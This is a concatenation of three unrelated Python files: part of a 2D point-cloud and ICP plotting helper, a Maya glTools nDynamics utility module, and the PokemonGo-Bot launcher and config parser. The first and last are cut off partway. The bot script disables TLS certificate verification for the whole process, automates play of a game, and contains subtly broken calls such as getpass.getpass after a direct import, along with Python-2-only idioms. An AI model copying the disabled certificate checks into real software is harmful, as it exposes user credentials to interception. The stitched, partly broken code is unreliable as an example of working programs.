def apply_tsf_2d(arr, tsf):
"""
Syntactic sugar
:param arr: Array of 2D points
:param tsf: Transformation matrix in R^{3 x 3}
:return: Array of 2D points with transformation matrix applied
"""
return (extend_1s(arr[:, :2]) @ tsf.T)[:, :2]
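# The transform helpers above compose as follows (illustrative numbers): rotate a
# point set by 90 degrees and translate it by (1, 0).
#
#     pts = np.array([[1.0, 0.0], [2.0, 0.0]])
#     tsf = tsl_n_angle2tsf(tsl=[1, 0], theta=math.pi / 2)
#     apply_tsf_2d(pts, tsf)    # ~ array([[1., 1.], [1., 2.]])
#     tsf2tsl_n_angle(tsf)      # ~ (array([1., 0.]), pi/2)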
def get_kuka_pointcloud():
# d_dim = config('dimensions.KUKA')
# return get_rect_pointcloud(d_dim['length'], d_dim['width'])
return get_rect_pointcloud(config('dimensions.KUKA'))
def get_rect_pointcloud(dim, n=240, visualize=False):
"""
:param dim: 2-tuple of (length, width) of dict with keys `length` and `width`
:param n: Number of points/beams
:param visualize: If True, shows an illustration of the process
:return: Array of 2D points of a rectangular contour, as if by a 360 degree of beams
"""
    ln, wd = (dim['length'], dim['width']) if isinstance(dim, dict) else dim
r = max(ln, wd)
r = np.full(n, r)
theta = np.linspace(0, 2 * math.pi, num=n+1)[:-1]
x, y = polar2planar(r, theta)
boundaries = (-ln/2, -wd/2, ln/2, wd/2)
def intersec_rect(left, bot, right, top):
""" :return: function that returns the intersection of point relative to a rectangle """
def _get(x_, y_):
"""
x, y should be outside of the rectangle
"""
ct_x = (left + right) / 2
ct_y = (bot + top) / 2
slope = (ct_y - y_) / (ct_x - x_)
if x_ <= ct_x:
y__ = slope * (left - x_) + y_
if bot <= y__ <= top:
return left, y__
if x_ >= ct_x:
y__ = slope * (right - x_) + y_
if bot <= y__ <= top:
return right, y__
if y_ <= ct_y:
x__ = (bot - y_) / slope + x_
if left <= x__ <= right:
return x__, bot
if y_ >= ct_y:
x__ = (top - y_) / slope + x_
if left <= x__ <= right:
return x__, top
if x_ == ct_x and y_ == ct_y:
return x_, y_
return _get
if visualize:
fig, ax = plt.subplots(figsize=(16, 9), constrained_layout=True)
for x_i, y_i in zip(x, y):
x_int, y_int = intersec_rect(*boundaries)(x_i, y_i)
ax.add_patch(Rectangle((-ln/2, -wd/2), ln, wd, edgecolor='b', fill=False))
ax.plot((0, x_int), (0, y_int), marker='o', c='c', ms=2, lw=0.5, ls='dotted')
ax.plot((x_i, x_int), (y_i, y_int), marker='o', c='orange', ms=2, ls='dotted')
plt.gca().set_aspect('equal')
plt.show()
intersec = intersec_rect(*boundaries)
return np.apply_along_axis(lambda i: intersec(*i), 1, np.vstack([x, y]).T)
def save_fig(save, title):
if save:
fnm = f'{title}.png'
plt.savefig(os.path.join(PATH_BASE, DIR_PROJ, 'plot', fnm), dpi=300)
def plot_points(arr, **kwargs):
"""
:param arr: Array of 2d points to plot
:param kwargs: Arguments are forwarded to `matplotlib.axes.Axes.plot`
"""
arr = np.asarray(arr)
kwargs_ = dict(
marker='.', lw=0.5, ms=1,
c='orange',
)
plt.plot(arr[:, 0], arr[:, 1], **(kwargs_ | kwargs))
def plot_2d(arr, label=None, title=None, save=False, show=True, **kwargs):
""" Plot potentially list pf 2D points """
def _plot(a, lb):
plt.plot(a[:, 0], a[:, 1], marker='o', ms=0.3, lw=0.25, label=lb, **kwargs)
plt.figure(figsize=(16, 9), constrained_layout=True)
if not isinstance(arr, list):
arr = [arr]
lbl = [None for _ in arr] if label is None else label
_ = [_plot(a, lb) for a, lb in zip(arr, lbl)] # Execute
if label:
plt.legend()
if title:
plt.title(title)
plt.gca().set_aspect('equal')
save_fig(save, title)
if show:
plt.show()
def plot_points3d(arr, **kwargs):
"""
:param arr: Array of 3d points to plot
:param kwargs: Arguments are forwarded to `matplotlib.axes.Axes.plot`
"""
arr = np.asarray(arr)
kwargs_ = dict(
marker='.', lw=0.5, ms=1,
c='orange',
)
    # plt.plot cannot take a third coordinate array; make sure we draw on 3D axes
    ax = plt.gca()
    if ax.name != '3d':
        ax = plt.gcf().add_subplot(projection='3d')
    ax.plot(arr[:, 0], arr[:, 1], arr[:, 2], **(kwargs_ | kwargs))
def plot_line_seg(c1, c2, with_arrow=True, **kwargs):
kwargs_ = dict(
ls='dotted', marker='o', lw=1, ms=2,
c='orange',
)
kwargs = kwargs_ | kwargs
plt.plot((c1[0], c2[0]), (c1[1], c2[1]), **kwargs)
if with_arrow:
plot_line_seg_arrow(c1, c2, color=get(kwargs, 'c'), alpha=get(kwargs, 'alpha'))
def plot_line_seg_arrow(c1, c2, r=0.01, **kwargs):
coords = np.array([c1, c2])
mean = coords.mean(axis=0)
mags = (coords[1] - coords[0]) * r
width = 5 * get_3rd_side(*mags)
if not hasattr(plot_icp_result, 'clp'):
plot_icp_result.clp = clipper(0.01, 0.05)
width = plot_icp_result.clp(width)
kwargs_ = dict(
alpha=0.5,
# head_width=0.05,
head_width=width,
length_includes_head=True,
lw=0,
overhang=0.2,
)
plt.arrow(
*(mean-mags/2), *mags,
**(kwargs_ | kwargs)
)
def plot_icp_result(
src, tgt, tsf,
        title=None, save=False,
# Repo: fsanges/glTools
import maya.cmds as mc
import maya.mel as mm
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.mesh
import glTools.utils.shape
import glTools.utils.stringUtils
from glTools.utils.weightList import WeightList
import os.path
# ----------
# - Checks -
# ----------
def isNDynamicsNode(nNode):
'''
Check if the specified object is a valid nDynamics node
@param node: Node to query
@type node: str
'''
# Check object exists
if not mc.objExists(nNode): return False
# Check shape
if mc.objectType(nNode) == 'transform': nNode = mc.listRelatives(nNode,s=True,ni=True,pa=True)[0]
# Check nucleus
if mc.objectType(nNode) == 'nucleus': return True
# Check nCloth
if mc.objectType(nNode) == 'nCloth': return True
# Check nRigid
if mc.objectType(nNode) == 'nRigid': return True
# Check nParticle
if mc.objectType(nNode) == 'nParticle': return True
# Check nComponent
if mc.objectType(nNode) == 'nComponent': return True
# Check dynamicConstraint
if mc.objectType(nNode) == 'dynamicConstraint': return True
# Return result
return False
def isNType(nNode,nType):
'''
Check if the specified object is a nucleus compatible nDynamics node
@param nNode: Object or node to query
@type nNode: str
@param nType: Nucleus compatible node type to check for
@type nType: str
'''
# Check object exists
if not mc.objExists(nNode): return False
# Check shape
if mc.objectType(nNode) == 'transform': nNode = mc.listRelatives(nNode,s=True,ni=True,pa=True)[0]
if mc.objectType(nNode) != nType: return False
# Return result
return True
def isNucleus(nucleus):
'''
Check if the specified object is a nucleus node
@param nucleus: Object to query
@type nucleus: str
'''
return isNType(nucleus,'nucleus')
def isNCloth(nCloth):
'''
Check if the specified object is an nCloth node
@param nCloth: Object to query
@type nCloth: str
'''
return isNType(nCloth,'nCloth')
def isNRigid(nRigid):
'''
Check if the specified object is an nRigid node
@param nRigid: Object to query
@type nRigid: str
'''
return isNType(nRigid,'nRigid')
def isNParticle(nParticle):
'''
Check if the specified object is an nParticle node
@param nParticle: Object to query
@type nParticle: str
'''
return isNType(nParticle,'nParticle')
def isNComponent(nComponent):
'''
Check if the specified object is an nComponent node
@param nComponent: Object to query
@type nComponent: str
'''
return isNType(nComponent,'nComponent')
def isNConstraint(nConstraint):
'''
Check if the specified object is an nConstraint node
@param nConstraint: Object to query
@type nConstraint: str
'''
return isNType(nConstraint,'dynamicConstraint')
def getConnectedNucleus(obj):
'''
Get the nucleus node connected to the specified nDynamics object
@param name: Name for nucleus node
@type name: str
'''
# Check nNode
if mc.objectType(obj) == 'transform':
obj = mc.listRelatives(obj,s=True,ni=True,pa=True)[0]
if not isNDynamicsNode(obj):
nNode = getConnectedNNode(obj)
if not nNode: raise Exception('No valid nDynamics node connected to "'+obj+'"!')
nNode = nNode[0]
else:
nNode = obj
# Check nucleus connections
nucleusConn = mc.listConnections(nNode,type='nucleus')
# Return result
if nucleusConn: return nucleusConn[0]
else: return ''
def getConnectedNNode(obj,nType=''):
'''
@param object: Object to find connected nNode for
@type object: str
@param nType: nDynamics node to check for. If empty, search for any valid nDynamics node
@type nType: str
'''
# Check object exists
if not mc.objExists(obj):
raise Exception('Object "'+obj+'" does not exist!')
# Check nNode
nNode = obj
if mc.objectType(obj) == 'transform':
nNodeShape = mc.listRelatives(obj,s=True,ni=True,pa=True)
if nNodeShape: nNode = nNodeShape[0]
if isNDynamicsNode(nNode):
if not nType or nType == mc.objectType(nNode):
return [nNode]
# Check nCloth
if not nType or nType == 'nCloth':
nNodeConn = mc.listConnections(nNode,type='nCloth',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nRigid
if not nType or nType == 'nRigid':
nNodeConn = mc.listConnections(nNode,type='nRigid',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nParticle
if not nType or nType == 'nParticle':
nNodeConn = mc.listConnections(nNode,type='nParticle',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nComponent
if not nType or nType == 'nComponent':
nNodeConn = mc.listConnections(nNode,type='nComponent',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# No nNode found, return empty result
return []
def getConnectedNCloth(obj):
'''
Return the nCloth node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nCloth')
def getConnectedNRigid(obj):
'''
Return the nRigid node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nRigid')
def getConnectedNParticle(obj):
'''
Return the nParticle node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nParticle')
def getConnectedNComponent(obj):
'''
'''
return getConnectedNNode(obj,'nComponent')
def getConnectedMesh(nNode,returnShape=False):
'''
Find the mesh shape or transform nodes connected to the specified nDynamics node
@param nNode: The nDynamics node to find the connected meshes for
@type nNode: str
@param returnShape: Return the mesh shape instead of the mesh transform
@type returnShape: bool
'''
# Check nNode node
if not isNDynamicsNode(nNode):
nNode = getConnectedNNode(nNode)
# Check outgoing connections
meshConn = mc.listConnections(nNode,s=False,d=True,sh=returnShape,type='mesh')
if meshConn: return meshConn[0]
# Check incoming connections
meshConn = mc.listConnections(nNode,s=True,d=False,sh=returnShape,type='mesh')
if meshConn: return meshConn[0]
# No mesh connections found, return empty result
return ''
# --------------------------
# - Get/Set Active Nucleus -
# --------------------------
def getActiveNucleus():
'''
Query the active nucleus node
'''
# Query active nucleus
nucleus = mm.eval('getActiveNucleusNode(true,false)')
# Return result
return nucleus
def setActiveNucleus(nucleus):
'''
Set the active nucleus node
@param nucleus: Nucleus node to set as current active nucleus
@type nucleus: str
'''
# Check nucleus
if not isNucleus(nucleus):
raise Exception('Object "'+nucleus+'" is not a valid nucleus node!')
# Set active nucleus
mm.eval('source getActiveNucleusNode')
mm.eval('setActiveNucleusNode("'+nucleus+'")')
# ----------------
# - Create Nodes -
# ----------------
def createNucleus(name='',setActive=True):
'''
Create nucleus node and make necessary connections
@param name: Name for nucleus node
@type name: str
@param setActive: Set the created nucleus as the current active nucleus
@type setActive: str
'''
# Check nucleus name
if not name: name = 'nucleus#'
# Create nucleus node
nucleus = mc.createNode('nucleus',n=name)
mc.connectAttr('time1.outTime',nucleus+'.currentTime')
# Set active nucleus
if setActive: setActiveNucleus(nucleus)
# Return result
return nucleus
def createNCloth(mesh,nucleus='',worldSpace=False,prefix=''):
'''
Create an nCloth object from the specified mesh.
@param mesh: Mesh to create nCloth from
@type mesh: str
@param nucleus: nucleus to attach nCloth to
@type nucleus: str
@param worldSpace: nCloth deformations in local or world space
@type worldSpace: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" is not a valid mesh!')
# Check prefix
if not prefix:
if '_' in mesh: prefix = glTools.utils.stringUtils.stripSuffix(mesh)
else: prefix = mesh
if ':' in prefix: prefix = prefix.split(':')[-1]
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
			nucleus = getActiveNucleus()
# Set active nucleus
setActiveNucleus(nucleus)
# Create nCloth from mesh
mc.select(mesh)
nClothShape = mm.eval('createNCloth '+str(int(worldSpace)))
nCloth = mc.listRelatives(nClothShape,p=True)[0]
# Rename nCloth
nCloth = mc.rename(nCloth,prefix+'_nCloth')
nClothShape = mc.listRelatives(nCloth,s=True)[0]
# Get outMesh
outMesh = mc.listConnections(nClothShape+'.outputMesh',s=False,d=True,sh=True)[0]
outMesh = mc.rename(outMesh,mesh+'ClothShape')
# return result
return nCloth
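# Minimal usage sketch (scene object names are hypothetical):
#
#     nucleus = createNucleus('cloth_nucleus')
#     cloth = createNCloth('shirt_mesh', nucleus=nucleus, worldSpace=True)
#
# The mesh must already exist in the scene; the returned transform is renamed from
# the mesh prefix (e.g. 'shirt_nCloth').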
def createNRigid(mesh,nucleus='',prefix=''):
'''
Create an nRigid object from the specified mesh.
@param mesh: Mesh to create nRigid from
@type mesh: str
@param nucleus: nucleus to attach nRigid to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" is not a valid mesh!')
# Check prefix
if not prefix:
if '_' in mesh: prefix = glTools.utils.stringUtils.stripSuffix(mesh)
else: prefix = mesh
if ':' in prefix: prefix = prefix.split(':')[-1]
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
			nucleus = getActiveNucleus()
# Set active nucleus
setActiveNucleus(nucleus)
# Create nRigid from mesh
mc.select(mesh)
nRigidShape = mm.eval('makeCollideNCloth')
nRigid = mc.listRelatives(nRigidShape,p=True,pa=True)[0]
# Rename nCloth
nRigid = mc.rename(nRigid,prefix+'_nRigid')
# Return result
return nRigid
def createNParticle(ptList=[],nucleus='',prefix=''):
'''
Create an nParticle object.
@param ptList: Mesh to create nCloth from
@type ptList: str
@param nucleus: nucleus to attach nCloth to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check prefix
if prefix: nParticle = prefix+'_nParticle'
else: nParticle = 'nParticle#'
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
			nucleus = getActiveNucleus()
# Set active nucleus
setActiveNucleus(nucleus)
# Create nParticles
	nParticle = mc.nParticle(p=ptList,n=nParticle)
	# Return result
	return nParticle
def softBody(geometry,nucleus='',prefix=''):
'''
Create an nParticle softBody from the specified geoemtry
@param geometry: Mesh to create nRigid from
@type geometry: str
@param nucleus: nucleus to attach nRigid to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check prefix
if not prefix: prefix = geometry
# Check geometry
geometryType = mc.objectType(geometry)
if geometryType == 'transform':
geometryTransform = geometry
geometryShapes = glTools.utils.shape.getShapes(geometry,nonIntermediates=True,intermediates=False)
if not geometryShapes: raise Exception('No valid geometry shapes found!')
geometryShape = geometryShapes[0]
else:
geometryTransform = mc.listRelatives(geometry,p=True)[0]
geometryShape = geometry
# Check geometry type
geometryType = mc.objectType(geometryShape)
if geometryType == 'mesh': geometryAttribute = 'inMesh'
elif geometryType == 'nurbsCurve': geometryAttribute = 'create'
elif geometryType == 'nurbsSurface': geometryAttribute = 'create'
else: raise Exception('Invalid geometry type ('+geometryType+')!')
# Get geometry points
mPtList = glTools.utils.base.getMPointArray(geometry)
ptList = [(i[0],i[1],i[2]) for i in mPtList]
# Create nParticles
nParticle = mc.nParticle(p=ptList,n=prefix+'_nParticle')
# Connect to geometry
mc.connectAttr(geometryTransform+'.worldMatrix[0]',nParticle+'.targetGeometryWorldMatrix',f=True)
mc.connectAttr(nParticle+'.targetGeometry',geometryShape+'.'+geometryAttribute,f=True)
# Return result
return nParticle
# -----------------
# - Connect Nodes -
# -----------------
def connectToNucleus(object,nucleus):
'''
Connect the specified nDynamics node to an existing nucleus node
@param object: nDynamics node to connect to the nucleus solver
@type object: str
@param nucleus: nucleus solver to connect to
@type nucleus: str
'''
# Check nucleus
if not isNucleus(nucleus):
preNucleusList = mc.ls(type='nucleus')
# Check nDynamics node
if isNDynamicsNode(object):
nNode = object
else:
		nNode = getConnectedNNode(object)
if not nNode: raise Exception('Object "'+object+'" is not a valid nDynamics node, or connected to a valid nDynamics node!')
nNode = nNode[0]
# Check nRigid
if isNRigid(nNode): connectNRigidToNucleus(nNode,nucleus,True)
# Assign nNode to nucleus solver
mc.select(nNode)
mm.eval('assignNSolver '+nucleus)
# Rename new nucleus node
if not mc.objExists(nucleus):
postNucleusList = mc.ls(type='nucleus')
newNucleus = list(set(postNucleusList) - set(preNucleusList))
if not newNucleus: raise Exception('Unable to determine new nucleus node attached to "'+object+'"!')
nucleus = mc.rename(newNucleus[0],nucleus)
# Return result
mc.select(nucleus)
return nucleus
def connectNRigidToNucleus(nRigid,nucleus,createNucleusNode=True):
'''
Connect the named nRigid (passive collision mesh) to the specified nucleus node
while maintaining existing connections to other nucleus nodes.
@param nRigid: nRigid node to attach
@type nRigid: str
@param nucleus: nucleus node to attach to
@type nucleus: str
	@param createNucleusNode: Create a new nucleus node if the specified node doesn't exist
	@type createNucleusNode: bool
'''
# Check nRigid node
if not isNRigid(nRigid):
nRigid = getConnectedNRigid(nRigid)
if not nRigid: raise Exception('Object "'+nRigid+'" is not a valid nRigid node!')
nRigid = nRigid[0]
# Check nucleus
	if not isNucleus(nucleus):
		# The flag is named so it does not shadow the module level createNucleus() function
		if createNucleusNode: nucleus = createNucleus(nucleus)
		else: raise Exception('Object "'+nucleus+'" is not a valid nucleus node!')
# Get next available index
nIndex = glTools.utils.attribute.nextAvailableMultiIndex(nucleus+'.inputPassive',0)
# Connect to nucleus
mc.connectAttr(nRigid+'.currentState',nucleus+'.inputPassive['+str(nIndex)+']')
mc.connectAttr(nRigid+'.startState',nucleus+'.inputPassiveStart['+str(nIndex)+']')
# Return result
return nIndex
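# Minimal usage sketch (object names are hypothetical): attach an existing passive
# collider to a second solver without disturbing its current nucleus connections.
#
#     idx = connectNRigidToNucleus('floor_nRigid', 'nucleus2')
#     # idx is the inputPassive[] multi-index used on 'nucleus2'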
# ----------------
# - Delete Nodes -
# ----------------
def deleteUnusedNucleusNodes():
'''
Delete all nucleus nodes that have no valid outgoing connections
'''
# Get existsing nucleus nodes
	nucleusList = mc.ls(type='nucleus')
# Initialize return list
nucleusDel = []
# Iterate over nodes
for nucleus in nucleusList:
# Check outgoing connections
nConn = mc.listConnections(nucleus,s=False,d=True)
if not nConn: nucleusDel.append(nucleus)
# Delete unused nucleus nodes
mc.delete(nucleusDel)
# Return result
return nucleusDel
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
import argparse
import codecs
import json
import logging
import os
import ssl
import sys
import time
from datetime import timedelta
from getpass import getpass
from pgoapi.exceptions import NotLoggedInException
from pokemongo_bot import PokemonGoBot, TreeConfigBuilder
from pokemongo_bot import logger
if sys.version_info >= (2, 7, 9):
ssl._create_default_https_context = ssl._create_unverified_context
def main():
logger.log('PokemonGO Bot v1.0', 'green')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
sys.stderr = codecs.getwriter('utf8')(sys.stderr)
config = init_config()
if not config:
return
logger.log('Configuration initialized', 'yellow')
finished = False
while not finished:
try:
bot = PokemonGoBot(config)
bot.start()
tree = TreeConfigBuilder(bot, config.raw_tasks).build()
bot.workers = tree
bot.metrics.capture_stats()
logger.log('Starting PokemonGo Bot....', 'green')
while True:
bot.tick()
except KeyboardInterrupt:
logger.log('Exiting PokemonGo Bot', 'red')
finished = True
report_summary(bot)
except NotLoggedInException:
logger.log('[x] Error while connecting to the server, please wait %s minutes' % config.reconnecting_timeout, 'red')
time.sleep(config.reconnecting_timeout * 60)
except:
# always report session summary and then raise exception
report_summary(bot)
raise
def report_summary(bot):
if bot.metrics.start_time is None:
return # Bot didn't actually start, no metrics to show.
metrics = bot.metrics
metrics.capture_stats()
logger.log('')
logger.log('Ran for {}'.format(metrics.runtime()), 'cyan')
logger.log('Total XP Earned: {} Average: {:.2f}/h'.format(metrics.xp_earned(), metrics.xp_per_hour()), 'cyan')
logger.log('Travelled {:.2f}km'.format(metrics.distance_travelled()), 'cyan')
logger.log('Visited {} stops'.format(metrics.visits['latest'] - metrics.visits['start']), 'cyan')
logger.log('Encountered {} pokemon, {} caught, {} released, {} evolved, {} never seen before'
.format(metrics.num_encounters(), metrics.num_captures(), metrics.releases,
metrics.num_evolutions(), metrics.num_new_mons()), 'cyan')
logger.log('Threw {} pokeball{}'.format(metrics.num_throws(), '' if metrics.num_throws() == 1 else 's'),
'cyan')
logger.log('Earned {} Stardust'.format(metrics.earned_dust()), 'cyan')
logger.log('')
if metrics.highest_cp is not None:
logger.log('Highest CP Pokemon: {}'.format(metrics.highest_cp['desc']), 'cyan')
if metrics.most_perfect is not None:
logger.log('Most Perfect Pokemon: {}'.format(metrics.most_perfect['desc']), 'cyan')
def init_config():
parser = argparse.ArgumentParser()
config_file = "configs/config.json"
web_dir = "web"
# If config file exists, load variables from json
load = {}
# Select a config file code
parser.add_argument("-cf", "--config", help="Config File to use")
config_arg = parser.parse_known_args() and parser.parse_known_args()[0].config or None
if config_arg and os.path.isfile(config_arg):
with open(config_arg) as data:
load.update(json.load(data))
elif os.path.isfile(config_file):
logger.log('No config argument specified, checking for /configs/config.json', 'yellow')
with open(config_file) as data:
load.update(json.load(data))
else:
logger.log('Error: No /configs/config.json or specified config', 'red')
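    # For reference, a minimal configs/config.json mirroring the flags registered
    # below might look like this (illustrative values only; the "tasks" entries are
    # described in the wiki linked further down):
    #
    #     {
    #         "auth_service": "ptc",
    #         "username": "YOUR_USERNAME",
    #         "password": "YOUR_PASSWORD",
    #         "location": "Some City, Country",
    #         "gmapkey": "YOUR_GOOGLE_MAPS_API_KEY",
    #         "tasks": [ ... ]
    #     }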
# Read passed in Arguments
    required = lambda x: x not in load
add_config(
parser,
load,
short_flag="-a",
long_flag="--auth_service",
help="Auth Service ('ptc' or 'google')",
required=required("auth_service"),
default=None
)
add_config(
parser,
load,
short_flag="-u",
long_flag="--username",
help="Username",
default=None
)
add_config(
parser,
load,
short_flag="-ws",
long_flag="--websocket_server",
help="Start websocket server (format 'host:port')",
default=False
)
add_config(
parser,
load,
short_flag="-p",
long_flag="--password",
help="Password",
default=None
)
add_config(
parser,
load,
short_flag="-l",
long_flag="--location",
help="Location",
type=parse_unicode_str,
default=''
)
add_config(
parser,
load,
short_flag="-lc",
long_flag="--location_cache",
help="Bot will start at last known location",
type=bool,
default=False
)
add_config(
parser,
load,
long_flag="--forts.spin",
help="Enable Spinning Pokestops",
type=bool,
default=True,
)
add_config(
parser,
load,
short_flag="-w",
long_flag="--walk",
help=
"Walk instead of teleport with given speed (meters per second, e.g. 2.5)",
type=float,
default=2.5
)
add_config(
parser,
load,
short_flag="-k",
long_flag="--gmapkey",
help="Set Google Maps API KEY",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-ms",
long_flag="--max_steps",
help=
"Set the steps around your initial location(DEFAULT 5 mean 25 cells around your location)",
type=int,
default=50
)
add_config(
parser,
load,
short_flag="-n",
long_flag="--navigator.type",
help="Set the navigator to be used(DEFAULT spiral)",
type=str,
default='spiral'
)
add_config(
parser,
load,
short_flag="-pm",
long_flag="--navigator.path_mode",
help="Set the mode for the path navigator (DEFAULT loop)",
type=str,
default="loop"
)
add_config(
parser,
load,
short_flag="-pf",
long_flag="--navigator.path_file",
help="Set the file containing the path for the path navigator (GPX or JSON).",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-d",
long_flag="--debug",
help="Debug Mode",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-t",
long_flag="--test",
help="Only parse the specified location",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-du",
long_flag="--distance_unit",
help="Set the unit to display distance in (e.g, km for kilometers, mi for miles, ft for feet)",
type=str,
default='km'
)
add_config(
parser,
load,
short_flag="-ev",
long_flag="--evolve_all",
help="(Batch mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will start by attempting to evolve all pokemon. Great after popping a lucky egg!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-ecm",
long_flag="--evolve_cp_min",
help="Minimum CP for evolve all. Bot will attempt to first evolve highest IV pokemon with CP larger than this.",
type=int,
default=300
)
add_config(
parser,
load,
short_flag="-ec",
long_flag="--evolve_captured",
help="(Ad-hoc mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will attempt to evolve all the pokemon captured!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-le",
long_flag="--use_lucky_egg",
help="Uses lucky egg when using evolve_all",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-rt",
long_flag="--reconnecting_timeout",
help="Timeout between reconnecting if error occured (in minutes, e.g. 15)",
type=float,
default=15.0
)
add_config(
parser,
load,
short_flag="-hr",
long_flag="--health_record",
help="Send anonymous bot event to GA for bot health record. Set \"health_record\":false if you need disable it.",
type=bool,
default=True
)
add_config(
parser,
load,
short_flag="-ac",
long_flag="--forts.avoid_circles",
help="Avoids circles (pokestops) of the max size set in max_circle_size flag",
type=bool,
default=False,
)
add_config(
parser,
load,
short_flag="-mcs",
long_flag="--forts.max_circle_size",
help="If avoid_circles flag is set, this flag specifies the maximum size of circles (pokestops) avoided",
type=int,
default=10,
)
add_config(
parser,
load,
long_flag="--catch_randomize_reticle_factor",
help="Randomize factor for pokeball throwing accuracy (DEFAULT 1.0 means no randomize: always 'Excellent' throw. 0.0 randomizes between normal and 'Excellent' throw)",
type=float,
default=1.0
)
add_config(
parser,
load,
long_flag="--catch_randomize_spin_factor",
help="Randomize factor for pokeball curve throwing (DEFAULT 1.0 means no randomize: always perfect 'Super Spin' curve ball. 0.0 randomizes between normal and 'Super Spin' curve ball)",
type=float,
default=1.0
)
# Start to parse other attrs
config = parser.parse_args()
if not config.username and 'username' not in load:
config.username = raw_input("Username: ")
if not config.password and 'password' not in load:
        config.password = getpass.getpass("Password: ")
config.catch = load.get('catch', {})
config.release = load.get('release', {})
config.item_filter = load.get('item_filter', {})
config.action_wait_max = load.get('action_wait_max', 4)
config.action_wait_min = load.get('action_wait_min', 1)
config.raw_tasks = load.get('tasks', [])
config.vips = load.get('vips',{})
if len(config.raw_tasks) == 0:
logging.error("No tasks are configured. Did you mean to configure some behaviors? Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information")
return None
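    # Illustrative shape of the "tasks" key in config.json. This is a sketch only -
    # the task names below are assumptions for the example, not taken from this file;
    # see the wiki link above for the supported task list.
    #   "tasks": [
    #       {"type": "CollectLevelUpReward"},
    #       {"type": "CatchVisiblePokemon"},
    #       {"type": "SpinFort"},
    #       {"type": "MoveToFort"}
    #   ]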
if config.auth_service not in ['ptc', 'google']:
logging.error("Invalid Auth service specified! ('ptc' or 'google')")
return None
def task_configuration_error(flag_name):
parser.error("""
\"{}\" was removed from the configuration options.
You can now change the behavior of the bot by modifying the \"tasks\" key.
Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information.
""".format(flag_name))
old_flags = ['mode', 'catch_pokemon', 'spin_forts', 'forts_spin', 'hatch_eggs', 'release_pokemon', 'softban_fix',
'longer_eggs_first']
for flag in old_flags:
if flag in load:
task_configuration_error(flag)
return None
nested_old_flags = [('forts', 'spin'), ('forts', 'move_to_spin')]
for outer, inner in nested_old_flags:
if load.get(outer, {}).get(inner, None):
task_configuration_error('{}.{}'.format(outer, inner))
return None
if (config.evolve_captured
and (not isinstance(config.evolve_captured, str)
or str(config.evolve_captured).lower() in ["true", "false"])):
parser.error('"evolve_captured" should be list of pokemons: use "all" or "none" to match all ' +
'or none of the pokemons, or use a comma separated list such as "Pidgey,Weedle,Caterpie"')
return None
if not (config.location or config.location_cache):
parser.error("Needs either --use-location-cache or --location.")
return None
if config.catch_randomize_reticle_factor < 0 or 1 < config.catch_randomize_reticle_factor:
parser.error("--catch_randomize_reticle_factor is out of range! (should be 0 <= catch_randomize_reticle_factor <= 1)")
return None
if config.catch_randomize_spin_factor < 0 or 1 < config.catch_randomize_spin_factor:
parser.error("--catch_randomize_spin_factor is out of range! (should be 0 <= catch_randomize_spin_factor <= 1)")
return None
# item list config verification
item_list = json.load(open(os.path.join('data', 'items.json')))
for config_item_name, bag_count in config.item_filter.iteritems():
if config_item_name not in item_list.viewvalues():
if config_item_name not in item_list:
parser.error('item "' + config_item_name + '" does not exist, spelling mistake? (check for valid item names in data/items.json)')
return None
# create web dir if not exists
try:
os.makedirs(web_dir)
except OSError:
